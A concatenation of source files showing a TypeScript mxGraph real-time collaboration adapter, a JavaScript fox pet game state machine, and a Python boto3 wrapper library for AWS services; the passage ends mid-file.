styleDiff.changedStyles[styleName]; if (newValue !== null) { this._rtStyles.set(styleName, newValue); } else { this._rtStyles.remove(styleName); } } } this._rtStyle.model().endBatch(); } private _localChildChange(change: mxChildChange): void { const {parent} = change; this._rtCell.set("parent", parent === null ? null : parent.id); this._eventCallback("onCellChanged", {cell: this._mxCell}); } private _initCell() { this._rtCell.on("set", (e: ObjectSetEvent) => { switch (e.key) { case "parent": const parentId = e.value.value(); const parent = parentId === null ? null : this._mxGraph.model.cells[parentId]; this._mxCell.setParent(parent); this._mxGraph.view.refresh(); this._eventCallback("onCellChanged", {cell: this._mxCell}); break; case "target": const targetId = e.value.value(); const target = targetId === null ? null : this._mxGraph.model.cells[targetId]; this._mxCell.setTerminal(target, false); this._mxGraph.view.refresh(); this._eventCallback("onCellChanged", {cell: this._mxCell}); break; case "source": const sourceId = e.value.value(); const source = sourceId === null ? null : this._mxGraph.model.cells[sourceId]; this._mxCell.setTerminal(source, true); this._mxGraph.view.refresh(); this._eventCallback("onCellChanged", {cell: this._mxCell}); break; case "style": this._initStyle(); const newStyle = Deserializer.deserializeStyle(this._rtStyle.value() as IStyleData); this._mxCell.setStyle(newStyle); this._mxGraph.view.refresh(); this._eventCallback("onCellChanged", {cell: this._mxCell}); break; case "value": const value = e.value.value(); this._mxCell.setValue(value); this._mxGraph.view.refresh(); this._eventCallback("onCellChanged", {cell: this._mxCell}); break; case "visible": const visible = e.value.value(); this._mxCell.setVisible(visible); this._mxGraph.view.refresh(); this._eventCallback("onCellChanged", {cell: this._mxCell}); break; case "collapsed": const collapsed = e.value.value(); this._mxCell.setCollapsed(collapsed); this._mxGraph.view.refresh(); this._eventCallback("onCellChanged", {cell: this._mxCell}); break; } }); } private _initRtGeometry(): RealTimeObject | null { if (this._rtCell.hasKey("geometry")) { const rtGeometry = this._rtCell.get("geometry") as RealTimeObject; rtGeometry.on("value", () => { const geometry = Deserializer.deserializeGeometry(rtGeometry.value() as IGeometry); this._mxCell.setGeometry(geometry); this._mxGraph.view.refresh(); setTimeout(() => { this._eventCallback("onCellChanged", {cell: this._mxCell}); }, 0); }); return rtGeometry; } else { return null; } } private _initStyle() { if (this._rtCell.hasKey("style")) { this._rtStyle = this._rtCell.get("style") as RealTimeObject; this._rtStyles = this._rtStyle.get("styles") as RealTimeObject; this._rtStyles.on("set", (e: ObjectSetEvent) => { this._mutateStyle((cellStyle: any) => { const styleName = e.key; cellStyle.styles[styleName] = e.value.value(); }); }); this._rtStyles.on("remove", (e: ObjectRemoveEvent) => { this._mutateStyle((cellStyle: any) => { const styleName = e.key; delete cellStyle.styles[styleName]; }); }); this._rtClasses = this._rtStyle.get("classes") as RealTimeArray; this._rtClasses.on("insert", (e: ArrayInsertEvent) => { this._mutateStyle((cellStyle: any) => { const className = e.value.value(); cellStyle.classes.push(className); }); }); this._rtClasses.on("remove", (e: ArrayRemoveEvent) => { this._mutateStyle((cellStyle: any) => { const className = e.oldValue.value(); const index = cellStyle.classes.indexOf(className); cellStyle.classes.splice(index, 1); }); }); } } private _mutateStyle(mutate: (current: any) => void) { const cellStyle = Serializer.serializeStyle(this._mxCell.style); mutate(cellStyle); const newStyle = Deserializer.deserializeStyle(cellStyle); this._mxCell.setStyle(newStyle); this._mxGraph.view.removeState(this._mxCell); this._mxGraph.view.refresh(); this._eventCallback("onCellChanged", {cell: this._mxCell}); } } <file_sep>import { Activity, ActivityParticipant, ActivitySessionJoinedEvent, ActivitySessionLeftEvent, ActivityStateSetEvent } from "@convergence/convergence"; import {mxCell, mxCellHighlight, mxEvent, mxGraph, mxSelectionCellsHandler} from "mxgraph"; import {ActivityColorManager} from "./ActivityColorManager"; import {MxGraphAdapter} from "./MxGraphAdapter"; interface IRemoteSelection { cells: { [key: string]: mxCellHighlight }; } export class SelectionManager { private static readonly _SELECTION_KEY = "selection"; private readonly _mxGraph: mxGraph; private readonly _activity: Activity; private readonly _colorManager: ActivityColorManager; private readonly _remoteSelectionsBySessionId: Map<string, IRemoteSelection>; private readonly _selectionHandler: mxSelectionCellsHandler; constructor( graph: mxGraph, activity: Activity, colorManager: ActivityColorManager, modelAdapter: MxGraphAdapter) { this._mxGraph = graph; this._activity = activity; this._colorManager = colorManager; modelAdapter.addListener({ onCellsRemoved: (evt: any) => { evt.cells.forEach((cell: mxCell) => { this._cellRemoved(cell); }); }, onCellChanged: (evt: any) => this._cellUpdated(evt.cell) }); this._remoteSelectionsBySessionId = new Map(); this._selectionHandler = this._mxGraph.selectionCellsHandler; this._selectionHandler.addListener(mxEvent.ADD, () => { this._setSelection(); }); this._selectionHandler.addListener(mxEvent.REMOVE, () => { this._setSelection(); }); this._activity.on("session_joined", (e: ActivitySessionJoinedEvent) => { this._addRemoteSelection(e.participant); }); this._activity.on("session_left", (e: ActivitySessionLeftEvent) => { this._updateRemoteSelection(e.sessionId, []); this._remoteSelectionsBySessionId.delete(e.sessionId); }); this._activity.on("state_set", (e: ActivityStateSetEvent) => { const {key, value, sessionId, local} = e; if (!local && key === SelectionManager._SELECTION_KEY) { this._updateRemoteSelection(sessionId, value); } }); this._activity.participants().forEach((participant: ActivityParticipant) => { this._addRemoteSelection(participant); }); } private _setSelection(): void { const selectedCells = this._mxGraph.getSelectionCells(); const cellIds = selectedCells.map((c: mxCell) => c.id) this._activity.setState(SelectionManager._SELECTION_KEY, cellIds); } private _addRemoteSelection(participant: ActivityParticipant): void { if (!participant.local) { const selection = participant.state.get(SelectionManager._SELECTION_KEY) || []; this._updateRemoteSelection(participant.sessionId, selection); } } private _cellUpdated(cell: mxCell): void { const handler = this._mxGraph.selectionCellsHandler.getHandler(cell); if (handler) { handler.redraw(); } this._remoteSelectionsBySessionId.forEach((remoteSelection: IRemoteSelection) => { const highlighter = remoteSelection.cells[cell.id]; if (highlighter) { const cellState = this._mxGraph.view.getState(cell); highlighter.highlight(null); highlighter.highlight(cellState); } }); } private _cellRemoved(cell: mxCell): void { this._remoteSelectionsBySessionId.forEach((remoteSelection: IRemoteSelection) => { const cellSelection = remoteSelection.cells[cell.id]; if (cellSelection) { cellSelection.destroy(); delete remoteSelection.cells[cell.id]; } }); } private _updateRemoteSelection(sessionId: string, cellIds: string[]): void { const currentSelection = this._remoteSelectionsBySessionId.get(sessionId); if (currentSelection) { Object.keys(currentSelection.cells).forEach((cellId: string) => { const shape = currentSelection.cells[cellId]; shape.destroy(); }); this._remoteSelectionsBySessionId.delete(sessionId); } if (cellIds && cellIds.length > 0) { const selection: IRemoteSelection = { cells: {} }; cellIds.forEach((cellId: string) => { const cell = this._mxGraph.model.cells[cellId]; if (cell !== null) { const color = this._colorManager.color(sessionId); const highlighter = new mxCellHighlight(this._mxGraph, color, 3, false); const cellState = this._mxGraph.view.getState(cell); highlighter.highlight(cellState); selection.cells[cellId] = highlighter; } }); this._remoteSelectionsBySessionId.set(sessionId, selection); } } }
dde56a4277b2eb0694266a504d3a1dbb8899e2eb
[ "Markdown", "TypeScript" ]
12
TypeScript
convergencelabs/mxgraph-adapter
8aed5bb2e1f0de2ac9098836f6227358f31a18c0
b2568087e49e57c1c40b9e92e35b685a5150cb2d
refs/heads/main
<repo_name>nisimdor/petGame<file_sep>/init.js // constants const TICK_RATE = 2000; const RAIN_CHANCE = 0.2; const ICONS = ["fish", "poop", "weather"]; const SCENES = ["day", "rain"]; const DAY_LENGTH = 60; const NIGHT_LENGTH = 4; const getNextHungerTime = (clock) => Math.floor(Math.random() * 3) + 4 + clock; const getNextDieTime = (clock) => Math.floor(Math.random() * 2) + 3 + clock; const getNextPoopTime = (clock) => Math.floor(Math.random() * 3) + 5 + clock; // buttons.js const toggleHighlighted = (icon, show) => { document .querySelector(`.${ICONS[icon]}-icon`) .classList.toggle("highlighted", show); }; function initButtons(handleUserAction) { let selectedIcon = 0; const updateIcon = (selected, reducer) => { toggleHighlighted(selected, false); selected = reducer(selected) % ICONS.length; toggleHighlighted(selected, true); return selected; }; function buttonClick({ target }) { if (target.classList.contains("left-btn")) { selectedIcon = updateIcon(selectedIcon, (x) => x + ICONS.length - 1); } else if (target.classList.contains("right-btn")) { selectedIcon = updateIcon(selectedIcon, (x) => x + 1); } else { handleUserAction(ICONS[selectedIcon]); } } document.querySelector(".buttons").addEventListener("click", buttonClick); } //ui const modFox = (state) => (document.querySelector(".fox").className = `fox fox-${state}`); const modScene = (state) => (document.querySelector(".game").className = `game ${state}`); const tooglePoopBag = (show) => document.querySelector(".poop-bag").classList.toggle("hidden", !show); const writeModal = (text = "") => { document.querySelector( ".modal" ).innerHTML = `<div class="modal-inner">${text}</div>`; }; //game state const Events = { FISH: "fish", POOP: "poop", WEATHER: "weather", // Time Based Events WAKE: "wake", SLEEP: "sleep", DIE: "die", START_POOP: "start_poop", START_CELEBRATE: "start_celebrate", END_CELEBRATE: "end_celebrate", HUNGRY: "hungry", }; const changeSettings = (fox, scene) => { modFox(fox); // scene is optional if (scene) { modScene(scene); } }; //#region tick events const startGame = (state) => { state.times[Events.WAKE] = state.clock + 3; changeSettings("egg", "day"); writeModal(); }; const wake = (state) => { state.times[Events.WAKE] = -1; state.scene = Math.random() > RAIN_CHANCE ? 0 : 1; changeSettings("idling", SCENES[state.scene]); state.times[Events.SLEEP] = state.clock + DAY_LENGTH; state.times[Events.HUNGRY] = getNextHungerTime(state.clock); }; const clearTimes = (state) => { Object.keys(state.times).forEach((keyTime) => (state.times[keyTime] = -1)); }; const sleep = (state) => { changeSettings("sleep", "night"); clearTimes(state); state.times[Events.WAKE] = state.clock + NIGHT_LENGTH; }; const hungry = (state) => { state.times[Events.DIE] = getNextDieTime(state.clock); state.times[Events.HUNGRY] = -1; changeSettings("hungry"); }; const die = (state) => { changeSettings("dead", "dead"); clearTimes(state); writeModal("The fox died :( <br/> Press the middle button to start"); }; const changeWeather = (state) => { state.scene = (state.scene + 1) % SCENES.length; modScene(SCENES[state.scene]); determineFoxState(state); }; const cleanPoop = (state) => { state.times[Events.DIE] = -1; tooglePoopBag(true); state.times[Events.HUNGRY] = getNextHungerTime(state.clock); }; const poop = (state) => { state.times[Events.POOP] = -1; state.times[Events.DIE] = getNextDieTime(state.clock); changeSettings("pooping"); }; const feed = (state) => { state.times[Events.DIE] = -1; state.times[Events.START_CELEBRATE] = state.clock + 2; changeSettings("eating"); state.times[Events.START_POOP] = getNextPoopTime(state.clock); }; const celebrate = (state) => { changeSettings("celebrate"); state.times[Events.START_CELEBRATE] = -1; state.times[Events.END_CELEBRATE] = state.clock + 2; }; const endCelebrate = (state) => { state.times[Events.END_CELEBRATE] = -1; tooglePoopBag(false); }; const determineFoxState = (state) => { console.log(state.current); if (state.current === "idling") { if (SCENES[state.scene] === "rain") { changeSettings("rain"); } else { changeSettings("idling"); } } }; //#endregion const gameState = { current: "init", clock: 1, times: { [Events.START_CELEBRATE]: -1, [Events.END_CELEBRATE]: -1, [Events.WAKE]: -1, [Events.SLEEP]: -1, [Events.DIE]: -1, [Events.HUNGRY]: -1, [Events.START_POOP]: -1, }, states: { init: { "*": { target: "hatching", actions: [startGame], }, }, hatching: { [Events.WAKE]: { target: "idling", actions: [wake], }, }, idling: { [Events.SLEEP]: { target: "sleeping", actions: [sleep], }, [Events.HUNGRY]: { target: "hungry", actions: [hungry], }, [Events.START_POOP]: { target: "pooping", actions: [poop], }, [Events.WEATHER]: { actions: [changeWeather], }, [Events.DIE]: { target: "dead", actions: [die], }, }, hungry: { [Events.FISH]: { target: "feeding", actions: [feed], }, [Events.WEATHER]: { actions: [changeWeather], }, [Events.DIE]: { target: "dead", actions: [die], }, }, feeding: { [Events.START_CELEBRATE]: { target: "celebrating", actions: [celebrate], }, [Events.WEATHER]: { actions: [changeWeather], }, }, celebrating: { [Events.END_CELEBRATE]: { target: "idling", actions: [endCelebrate, determineFoxState], }, [Events.WEATHER]: { actions: [changeWeather], }, }, pooping: { [Events.POOP]: { target: "celebrating", actions: [cleanPoop, celebrate], }, [Events.WEATHER]: { actions: [changeWeather], }, [Events.DIE]: { target: "dead", actions: [die], }, }, sleeping: { [Events.WAKE]: { target: "idling", actions: [wake], }, [Events.WEATHER]: { actions: [changeWeather], }, }, dead: { "*": { target: "hatching", actions: [startGame], }, }, }, tick() { this.clock++; let currentClock = this.clock; let event = Object.keys(this.times).find( (key) => this.times[key] !== -1 && this.times[key] <= currentClock ); console.log(currentClock, event, this.times); if (event) { handleUserAction(event); } return this.clock; }, }; function handleUserAction(event) { let currentState = gameState.states[gameState.current]; if (currentState) { // if we have a wildcard event or a defined event let handler = currentState[event] || currentState["*"]; if (handler) { gameState.current = handler.target || gameState.current; (handler.actions || []).forEach((f) => f(gameState)); } } } async function init() { console.log("starting game"); initButtons(handleUserAction); let nextTimeToTick = Date.now(); function nextAminationFrame() { const now = Date.now(); if (nextTimeToTick <= now) { gameState.tick(); nextTimeToTick = now + TICK_RATE; } requestAnimationFrame(nextAminationFrame); } requestAnimationFrame(nextAminationFrame); } init();
ab553d8892001d5e11bfa4df7be4772fe3e1c724
[ "JavaScript" ]
1
JavaScript
nisimdor/petGame
48e32f818d4fbe09e329a0c0fcb17eeda4628b3e
7dd834ea411a48253602b426e6d3cabf049ab15a
refs/heads/master
<file_sep>import time from madeira import session, sts from madeira_utils import loggers class StepFunctions: def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self._sts = sts.Sts(logger=logger, profile_name=None, region=None) self.step_functions_client = self._session.session.client('stepfunctions') def create_state_machine(self, name, definition, role_arn, attempt=1): if attempt > 10: self._logger.error('Exhausted %s attempts to deploy state machine: %s', attempt, name) return False self._logger.debug('Attempt: %s to deploy state machine: %s', attempt, name) try: result = self.step_functions_client.create_state_machine(name=name, definition=definition, roleArn=role_arn) self._logger.info('Created state machine: %s', name) return result except self.step_functions_client.exceptions.StateMachineDeleting: self._logger.warning('State machine: %s is still in the process of deleting', name) self._logger.info('Waiting a while for that process to finish') time.sleep(10) return self.create_state_machine(name, definition, role_arn, attempt=attempt+1) def create_or_update_state_machine(self, name, definition, role_arn): try: state_machine_arn = (f'arn:aws:states:{self._session.region}:' f'{self._sts.account_id}:stateMachine:{name}') state_machine = self.step_functions_client.describe_state_machine(stateMachineArn=state_machine_arn) if state_machine['status'] == 'DELETING': return self.create_state_machine(name, definition, role_arn) return self.update_state_machine(state_machine_arn, definition, role_arn) except self.step_functions_client.exceptions.StateMachineDoesNotExist: return self.create_state_machine(name, definition, role_arn) def delete_state_machine(self, arn): self.step_functions_client.delete_state_machine(stateMachineArn=arn) def list_state_machines(self): return self.step_functions_client.list_state_machines().get('stateMachines') def wait_for_executions(self, state_machine_arn, wait_interval=60): max_retries = 60 count = 0 while True: count += 1 response = self.step_functions_client.list_executions( stateMachineArn=state_machine_arn, statusFilter='RUNNING') execution_arns = [execution['executionArn'] for execution in response.get('executions')] if execution_arns: if count == max_retries: self._logger.error('Timed out waiting for state machine executions to finish:') for execution_arn in execution_arns: self._logger.error(' %s', execution_arn) return self._logger.info('Waiting %s sec for state machine executions to finish:', wait_interval) for execution_arn in execution_arns: self._logger.info(' %s', execution_arn) time.sleep(wait_interval) else: self._logger.info('State machine executions of %s completed', state_machine_arn) return def update_state_machine(self, state_machine_arn, definition, role_arn): result = self.step_functions_client.update_state_machine( stateMachineArn=state_machine_arn, definition=definition, roleArn=role_arn ) self._logger.info('Updated state machine: %s', state_machine_arn) return result <file_sep>from datetime import datetime import time from madeira import session, s3 from madeira_utils import loggers class CloudFront(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.cloudfront_client = self._session.session.client('cloudfront') self._s3 = s3.S3(logger=None, profile_name=None, region=None) def get_distribution_by_comment(self, comment): for distro in self.cloudfront_client.list_distributions()['DistributionList']['Items']: if distro['Comment'] == comment: return distro def invalidate_cache(self, distro_id, items=None): if not items: items = ['/*'] self._logger.info('Invalidating items: %s in distro: %s', items, distro_id) return self.cloudfront_client.create_invalidation( DistributionId=distro_id, InvalidationBatch={ 'Paths': { 'Quantity': len(items), 'Items': items }, 'CallerReference': str(datetime.utcnow().timestamp()) } )['Invalidation']['Id'] def update_cdn_content(self, cdn_id, bucket, files): changed_files = self._s3.sync_files(bucket, files) for i, changed_file in enumerate(changed_files): if not changed_file.startswith('/'): changed_files[i] = f'/{changed_file}' # invalidate the cloudfront cache if any assets are changed if changed_files: self._logger.info("One or more asset files have changed") invalidation_id = self.invalidate_cache(cdn_id, items=changed_files) self.wait_for_invalidation_completion(cdn_id, invalidation_id) else: self._logger.info("No asset file changes detected; skipping distro cache invalidation") def wait_for_invalidation_completion(self, distro_id, invalidation_id): max_status_checks = 10 status_check_interval = 10 # wait for stack "final" state desired_status = 'Completed' status_check = 0 while status_check < max_status_checks: status_check += 1 # TODO: exception handling status = self.cloudfront_client.get_invalidation( DistributionId=distro_id, Id=invalidation_id)['Invalidation']['Status'] if status == desired_status: self._logger.info('Distro cache invalidation %s complete', invalidation_id) return True self._logger.info('Distro cache invalidation %s status is: %s - waiting', invalidation_id, status) if status_check >= max_status_checks: raise RuntimeError('Timed out waiting for invalidation %s', invalidation_id) time.sleep(status_check_interval) <file_sep>import uuid from madeira import session from madeira_utils import loggers class Route53(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.r53_client = self._session.session.client('route53') def create_hosted_zone(self, dns_domain, caller_reference=None): caller_reference = caller_reference if caller_reference else uuid.uuid4().hex self._logger.debug('Creating hosted zone for DNS domain: %s', dns_domain) return self.r53_client.create_hosted_zone( Name=dns_domain, CallerReference=caller_reference) def delete_hosted_zone_by_name(self, dns_domain): return self.r53_client.delete_hosted_zone(Id=self.get_hosted_zone_id(dns_domain)) def get_hosted_zone(self, hosted_zone_id): return self.r53_client.get_hosted_zone(Id=hosted_zone_id) def get_hosted_zone_id(self, dns_domain): self._logger.debug('Looking up hosted zone ID for domain: %s', dns_domain) for hosted_zone in self.r53_client.list_hosted_zones().get('HostedZones'): # Hosted zones have trailing dots... if hosted_zone['Name'] == f'{dns_domain}': return hosted_zone['Id'] self._logger.debug('No hosted zone found') def get_domain_ns_records(self, hosted_zone_id): hosted_zone = self.get_hosted_zone(hosted_zone_id) return hosted_zone['DelegationSet']['NameServers'] <file_sep>import boto3 from madeira_utils import loggers session_store = {} class Session(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() # re-use an already-instantiated session, if possible profile_key = profile_name if profile_name else 'default_profile' region_key = region if region else 'default_region' session_key = f"{profile_key}:{region_key}" if session_key in session_store: self._logger.debug('Using session: %s from session store', session_key) self.session = session_store[session_key] else: self._logger.debug('Creating new boto3 session') self.session = boto3.Session(profile_name=profile_name, region_name=region) self._logger.debug('Saving session: %s in session store', session_key) session_store[session_key] = self.session # for convenience self.profile_name = self.session.profile_name self.region = self.session.region_name <file_sep>from madeira import session from madeira_utils import loggers class SQS(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.sqs_resource = self._session.session.resource('sqs') def get_queue(self, name): return self.sqs_resource.get_queue_by_name(QueueName=name) def send_message(self, queue_name, message_group_id, message_body, message_attributes=None): return self.get_queue(queue_name).send_message( MessageGroupId=message_group_id, MessageBody=message_body, MessageAttributes=message_attributes) <file_sep>import re import time from madeira import session from madeira_utils import loggers class CloudFormation(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.cf_client = self._session.session.client('cloudformation') self._max_status_checks = 20 self._status_check_interval = 20 def _wait_for_status(self, stack_name, desired_status, max_status_checks=None, status_check_interval=None): max_status_checks = max_status_checks if max_status_checks else self._max_status_checks status_check_interval = status_check_interval if status_check_interval else self._status_check_interval # wait for stack "final" state status_check = 0 while status_check < max_status_checks: status_check += 1 try: stack = self.cf_client.describe_stacks(StackName=stack_name)['Stacks'][0] except self.cf_client.exceptions.ClientError as e: stack_missing_msg = f'Stack with id {stack_name} does not exist' if stack_missing_msg in str(e) and desired_status == 'DELETE_COMPLETE': return True else: raise if stack['StackStatus'].startswith('ROLLBACK_'): self._logger.error('%s: cloudformation stack cannot be deployed due to status: %s - delete and re-try', stack['StackName'], stack['StackStatus']) return False elif stack['StackStatus'] == 'DELETE_FAILED': self._logger.critical('%s: cloudformation stack deletion failed - please investigate', stack['StackName']) return False elif stack['StackStatus'] == desired_status: self._logger.info('%s: cloudformation stack deployment complete', stack['StackName']) return True self._logger.info('%s: cloudformation stack status: %s; waiting', stack['StackName'], stack['StackStatus']) if status_check >= max_status_checks: raise RuntimeError('%s: deployment timed out') time.sleep(status_check_interval) def create_stack(self, stack_name, template_body, params=None, tags=None, termination_protection=True, max_status_checks=None, status_check_interval=None): try: if self.cf_client.describe_stacks(StackName=stack_name).get('Stacks'): self._logger.warning('Stack with name: %s already exists - skipping', stack_name) return False except self.cf_client.exceptions.ClientError as e: if f'Stack with id {stack_name} does not exist' in str(e): self._logger.debug('%s: cloudformation stack does not exist', stack_name) else: raise if not params: params = [] if not tags: tags = [] self._logger.info('%s: requesting creation of stack', stack_name) response = self.cf_client.create_stack( StackName=stack_name, Capabilities=['CAPABILITY_NAMED_IAM'], Parameters=params, TemplateBody=template_body, Tags=tags, EnableTerminationProtection=termination_protection ) stack_arn = response['StackId'] self._logger.debug('%s: cloudformation stack ARN: %s', stack_name, stack_arn) result = self._wait_for_status(stack_name, 'CREATE_COMPLETE', max_status_checks=max_status_checks, status_check_interval=status_check_interval) return stack_arn if result else False def create_or_update_stack(self, stack_name, template_body, params=None, tags=None, termination_protection=True, max_status_checks=None, status_check_interval=None): stack = self.get_stack(stack_name) if stack: if stack['StackStatus'] == 'ROLLBACK_COMPLETE': self._logger.info('%s: cleaning up cloudformation stack from failed initial deployment', stack_name) self.delete_stack(stack_name, disable_termination_protection=termination_protection) else: # update the existing stack self._logger.info('%s: cloudformation stack already exists - may need update', stack_name) return self.update_stack(stack_name, template_body, params=params, tags=tags, max_status_checks=max_status_checks, status_check_interval=status_check_interval) # create the stack that does not exist (or was cleaned up) return self.create_stack(stack_name, template_body, params=params, tags=tags, termination_protection=termination_protection, max_status_checks=max_status_checks, status_check_interval=status_check_interval) def create_bucket_using_cf(self, bucket_name, cf_stack_name, cf_template_file, logging_bucket_name, vpc_id=None): with open(cf_template_file, "r") as f: template_body = f.read() params = [ {"ParameterKey": "BucketName", "ParameterValue": bucket_name}, { "ParameterKey": "LoggingBucketName", "ParameterValue": logging_bucket_name, }, ] if vpc_id: params.append({"ParameterKey": "VpcId", "ParameterValue": vpc_id}) self.create_stack(cf_stack_name, template_body, params) def create_or_update_bucket_using_cf( self, bucket_name, cf_stack_name, cf_template_file, logging_bucket_name, vpc_id=None): with open(cf_template_file, "r") as f: template_body = f.read() params = [ {"ParameterKey": "BucketName", "ParameterValue": bucket_name}, { "ParameterKey": "LoggingBucketName", "ParameterValue": logging_bucket_name, }, ] if vpc_id: params.append({"ParameterKey": "VpcId", "ParameterValue": vpc_id}) self.create_or_update_stack(cf_stack_name, template_body, params) def create_bucket_using_cf_custom_params(self, cf_stack_name, cf_template_file, parameters): with open(cf_template_file, "r") as f: template_body = f.read() self.create_stack(cf_stack_name, template_body, params=parameters) def create_or_update_bucket_using_cf_custom_params(self, cf_stack_name, cf_template_file, parameters): with open(cf_template_file, "r") as f: template_body = f.read() self.create_or_update_stack( cf_stack_name, template_body, params=parameters ) def delete_stack(self, stack_name, max_status_checks=None, disable_termination_protection=False, status_check_interval=None): max_status_checks = max_status_checks if max_status_checks else self._max_status_checks status_check_interval = status_check_interval if status_check_interval else self._status_check_interval stack = self.get_stack(stack_name) if not stack: self._logger.info('%s: cloudformation stack does not exist', stack_name) return if stack['StackStatus'] in ['DELETE_COMPLETE', 'DELETE_IN_PROGRESS']: self._logger.warning('Skipping stack: %s due to status: %s', stack['StackName'], stack['StackStatus']) return if disable_termination_protection: self._logger.info('Disabling termination protection for %s', stack_name) self.cf_client.update_termination_protection(EnableTerminationProtection=False, StackName=stack_name) self._logger.info('Requesting deletion of stack: %s', stack_name) self.cf_client.delete_stack(StackName=stack_name) return self._wait_for_status(stack_name, 'DELETE_COMPLETE', max_status_checks=max_status_checks, status_check_interval=status_check_interval) @staticmethod def get_filtered_stack_name(stack_name): return re.sub(r'[^0-9a-zA-Z]+', '', stack_name.title()) def get_stack(self, stack_name): try: return self.cf_client.describe_stacks(StackName=stack_name)['Stacks'][0] except self.cf_client.exceptions.ClientError as e: if 'does not exist' in str(e): return else: raise def get_stack_outputs(self, stack_name): stack = self.get_stack(stack_name) return {output['OutputKey']: output['OutputValue'] for output in stack['Outputs']} def get_stacks(self): return self.cf_client.describe_stacks().get('Stacks') def update_stack(self, stack_name, template_body, params=None, tags=None, max_status_checks=None, status_check_interval=None): existing_stack = {} try: existing_stack = self.cf_client.describe_stacks(StackName=stack_name).get('Stacks')[0] if (existing_stack['StackStatus'].startswith('DELETE') or existing_stack['StackStatus'].startswith('ROLLBACK')): self._logger.error('Stack: %s has status: %s which is impossible to update', stack_name, existing_stack['StackStatus']) return existing_stack['StackId'] except self.cf_client.exceptions.ClientError as e: if f'Stack with id {stack_name} does not exist' in str(e): self._logger.debug('%s: cloudformation stack does not exist', stack_name) return False params = params if params else [] tags = tags if tags else [] try: self.cf_client.update_stack( StackName=stack_name, Capabilities=['CAPABILITY_NAMED_IAM'], Parameters=params, TemplateBody=template_body, Tags=tags ) self._logger.info('%s: updating stack', stack_name) except self.cf_client.exceptions.ClientError as e: if 'No updates are to be performed' in str(e): self._logger.info('%s: cloudformation stack update not required', stack_name) return existing_stack['StackId'] else: raise result = self._wait_for_status(stack_name, 'UPDATE_COMPLETE', max_status_checks=max_status_checks, status_check_interval=status_check_interval) return existing_stack['StackId'] if result else False <file_sep>#!/usr/bin/env bash set -e echo "cleaning up old builds" rm -rf dist/ build/ ./*.egg-info # requires "wheel" and "twine" python packages python3 setup.py sdist bdist_wheel twine check dist/* twine upload --repository testpypi dist/* twine upload dist/* <file_sep>from madeira import session, kms from madeira_utils import loggers class Glue(object): def __init__(self, logger=None, profile_name=None, region=None): self._logger = logger if logger else loggers.get_logger() self._session = session.Session(logger=logger, profile_name=profile_name, region=region) self.glue_client = self._session.session.client('glue') self._kms = kms.Kms(logger=logger, profile_name=profile_name, region=region) def create_database(self, database): try: self._logger.info('Creating glue catalog database: %s', database) return self.glue_client.create_database(DatabaseInput={'Name': database}) except self.glue_client.exceptions.AlreadyExistsException: self._logger.warning('Database already exists: %s', database) def create_or_update_job(self, name, role_arn, s3_script_path, description='', glue_version='1.0', max_capacity=16, max_retries=0, timeout_min=2880, worker_count=None, worker_type=None, max_concurrent_runs=8, command_name='glueetl', default_arguments=None, security_configuration=None): # TODO: docstring with explanation of mutually exclusive params job_params = dict( Name=name, Description=description, Role=role_arn, ExecutionProperty={ 'MaxConcurrentRuns': max_concurrent_runs }, Command={ 'Name': command_name, 'ScriptLocation': s3_script_path, 'PythonVersion': '3' }, # TODO: API doc doesn't really specify what to use here... may not be needed for S3-to-S3 ETL. # Connections={ # 'Connections': [ # 'string', # ] # }, MaxRetries=max_retries, Timeout=timeout_min, MaxCapacity=max_capacity, # TODO: API doc doesn't really specify what to use here... may not be needed for S3-to-S3 ETL. # SecurityConfiguration='string', # TODO: activate this if/when needed # NotificationProperty={ # 'NotifyDelayAfter': 0 # }, GlueVersion=glue_version ) if default_arguments: job_params['DefaultArguments'] = default_arguments if security_configuration: job_params['SecurityConfiguration'] = security_configuration if worker_type and worker_count: self._logger.warning('Since "max_capacity" is mutually exclusive to the combination of the "worker_type"' 'and "worker_count" arguments, "max_capacity" is being dropped') job_params.update(dict( NumberOfWorkers=worker_count, WorkerType=worker_type )) del(job_params['MaxCapacity']) try: self.glue_client.get_job(JobName=name) self._logger.info('Glue Job: %s already exists; updating it', name) del(job_params['Name']) self.glue_client.update_job(JobName=name, JobUpdate=job_params) except self.glue_client.exceptions.EntityNotFoundException: self._logger.info('Creating Glue Job: %s', name) self.glue_client.create_job(**job_params) return name def create_or_update_table(self, database, name, glue_table): try: self.glue_client.get_table(DatabaseName=database, Name=name) self._logger.info('Updating table: %s', name) self.glue_client.update_table(**glue_table) except self.glue_client.exceptions.EntityNotFoundException: self._logger.info('Creating table: %s', name) self.glue_client.create_table(**glue_table) def delete_database(self, database): try: self._logger.info('Deleting glue database: %s', database) return self.glue_client.delete_database(Name=database) except self.glue_client.exceptions.EntityNotFoundException: self._logger.warning('Database does not exist: %s', database) return False def delete_job(self, job): return self.glue_client.delete_job(JobName=job) def delete_table(self, database, table): try: self._logger.info('Deleting glue table: %s', table) return self.glue_client.delete_table(DatabaseName=database, Name=table) except self.glue_client.exceptions.EntityNotFoundException: self._logger.warning('Either database: %s or table: %s does not exist', database, table) return False def list_jobs(self): # get the largest chunk possible according to AWS API limits max_results = 100 glue_jobs = list() self._logger.debug('Reading first chunk of glue jobs') glue_job_chunk = self.glue_client.list_jobs( MaxResults=max_results ) glue_jobs.extend(glue_job_chunk.get('JobNames')) while glue_job_chunk.get('NextToken'): self._logger.debug('Reading next chunk of glue jobs') glue_job_chunk = self.glue_client.list_jobs( NextToken=glue_job_chunk.get('NextToken'), MaxResults=max_results ) glue_jobs.extend(glue_job_chunk.get('JobNames')) return glue_jobs def list_tables(self, database): try: return self.glue_client.get_tables(DatabaseName=database, MaxResults=999).get('TableList') except self.glue_client.exceptions.EntityNotFoundException: return [] <file_sep>import configparser import os import uuid from madeira import session from madeira_utils import loggers class Sts(object): def __init__(self, 